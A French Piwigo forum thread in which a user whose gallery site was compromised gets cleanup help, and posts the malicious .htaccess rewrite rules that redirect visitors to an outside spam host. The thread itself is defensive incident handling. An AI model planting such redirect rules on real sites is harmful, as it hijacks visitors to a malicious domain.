Annonce

#1 2013-01-30 18:34:40

Bouba
Membre
Valdahon - Narbonne
2009-06-12
46

Crash du site

Bonjour,
Je ne sais pas du tout ce qu'il se passe. Je suis parti en déplacement une semaine, et à mon retour mon site ne fonctionne plus.
La page d'accueil ne s'affiche pas correctement, et quand je clique sur les liens c'est la page de Google qui s'ouvre.
Si quelqu'un a une idée je suis preneur.

http://amt-photos.com/

Hors ligne

#2 2013-01-30 18:44:11

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3561

Re: Crash du site

on devrait arriver sur quoi ? piwigo ou un accueil perso ?

je pense que vous vous etez fait hacké, vérifiez par FTP ce que vous avez comme fichiers

vous avez un lien quelconque avec adventurerabbi.com ? parce qu'a la première visite j'ai été redirigé chez eux (ensuite vers google)

Hors ligne

#3 2013-01-30 18:49:12

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3561

Re: Crash du site

étonnement sur Chrome ou IE j'arrive bien sur l'accueil, mais effectivement tous les liens et même les fichiers incluts redirigent vers google (sauf le favicon...)

Hors ligne

#4 2013-01-30 19:01:24

Bouba
Membre
Valdahon - Narbonne
2009-06-12
46

Re: Crash du site

mistic100 a écrit:

je pense que vous vous etez fait hacké, vérifiez par FTP ce que vous avez comme fichiers

C'est bien ce que je craignais.
Pendant mon absence j'ai eu trois fichier de modifié à la racine du site:
error_log
.htaccess
default.php

Et les dossiers suivants:
Tools
plugins
agb
install
galleries
language
doc
local
include
_vti_txt
_vti_pvt
_vti_cnf
_private

Hors ligne

#5 2013-01-30 19:48:20

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3561

Re: Crash du site

est-ce que parmis les fichiers/dossier suivants il y en a que vous avec mit vous meme  ?
agb
_vti_txt
_vti_pvt
_vti_cnf
_private
default.php

quel est le contenu du htaccess ?

Hors ligne

#6 2013-01-30 20:48:50

Bouba
Membre
Valdahon - Narbonne
2009-06-12
46

Re: Crash du site

mistic100 a écrit:

est-ce que parmis les fichiers/dossier suivants il y en a que vous avec mit vous meme  ?
agb
_vti_txt
_vti_pvt
_vti_cnf
_private
default.php

quel est le contenu du htaccess ?

Non je n'ai rien touché depuis le 19/01, hors les dossiers sont indiqués modifiés le 28/01

Le fichier htaccess:

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

RewriteRule ^.*$ http://ptbshop.ionvin.net/eoai.html?h=1332454 [L,R]

</IfModule>

Dernière modification par Bouba (2013-01-30 20:49:32)

Hors ligne

#7 2013-01-30 20:57:36

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3561

Re: Crash du site

bon alors dans l'ordre :
-changez vos mots de passe FTP, MySQL et administration de votre espace d'hébergement si ce n'est déjà fait
- supprimez les fichiers et dossier suscités (htaccess compris)
- téléchargez l'archive complète de Piwigo pour écraser tous les fichiers
- changez le mot de passe Piwigo

Hors ligne

#8 2013-01-30 20:59:49

Bouba
Membre
Valdahon - Narbonne
2009-06-12
46

Re: Crash du site

mistic100 a écrit:

bon alors dans l'ordre :
-changez vos mots de passe FTP, MySQL et administration de votre espace d'hébergement si ce n'est déjà fait
- supprimez les fichiers et dossier suscités (htaccess compris)
- téléchargez l'archive complète de Piwigo pour écraser tous les fichiers
- changez le mot de passe Piwigo

Ok, je me lance

Hors ligne

#9 2013-01-30 21:08:20

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3561

Re: Crash du site

tout ça c'est en espérant qu'il n'ai pas corrompu la base de donnée puisqu'il avait manifestement accès au FTP (et donc aux identifiants)

d'ailleurs il faudra mettre à jour local/config/database.inc.php avec le nouveau mot de passe

Hors ligne

#10 2013-01-30 21:47:47

Bouba
Membre
Valdahon - Narbonne
2009-06-12
46

Re: Crash du site

mistic100 a écrit:

tout ça c'est en espérant qu'il n'ai pas corrompu la base de donnée puisqu'il avait manifestement accès au FTP (et donc aux identifiants)

d'ailleurs il faudra mettre à jour local/config/database.inc.php avec le nouveau mot de passe

Bon, j'ai essayé mais rien à faire. Je vais tout simplement refaire mon site.

En revanche, comment s'assurer que cela ne se reproduise pas ?

Hors ligne

#11 2013-01-30 21:57:26

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3561

Re: Crash du site

ne pas stocker ses mdp n'importe ou, ne pas se connecter en FTP (pas secure du tout) depuis des ordinateurs publics et/ou sur lesquels il y a des malwares, etc.

des règles basiques de sécurité info en somme

Hors ligne

#12 2013-01-30 22:06:16

Bouba
Membre
Valdahon - Narbonne
2009-06-12
46

Re: Crash du site

mistic100 a écrit:

ne pas stocker ses mdp n'importe ou, ne pas se connecter en FTP (pas secure du tout) depuis des ordinateurs publics et/ou sur lesquels il y a des malwares, etc.

des règles basiques de sécurité info en somme

Je n'ai rien fait de tout ça.
Mais je pense que le plus gros soucis était que j'avais le même mot de passe pour l'admin du site, le FTP et le base de donnée. Pas très fin je sais ..... cela me servira de leçon.

3 ans de boulot en fumée, j'ai les boules

Merci pour ton aide.

Hors ligne

#13 2013-01-31 10:12:13

plg
Équipe Piwigo
Nantes, France, Europe
2002-04-05
12644

Re: Crash du site

Demande à ton hébergeur de restaurer le site. Pour certains hébergeurs (comme Piwigo.com...) c'est pas très compliqué pour les administrateurs.


Les historiens ont établi que Pierrick était le premier utilisateur connu de Piwigo.

Hors ligne

#14 2013-01-31 10:16:32

Bouba
Membre
Valdahon - Narbonne
2009-06-12
46

Re: Crash du site

plg a écrit:

Demande à ton hébergeur de restaurer le site. Pour certains hébergeurs (comme Piwigo.com...) c'est pas très compliqué pour les administrateurs.

Je suis en contact avec eux, mais cela n'a pas l'air simple ...........

Hors ligne

Pied de page des forums

Propulsé par FluxBB

github twitter newsletter Faire un don Piwigo.org © 2002-2024 · Contact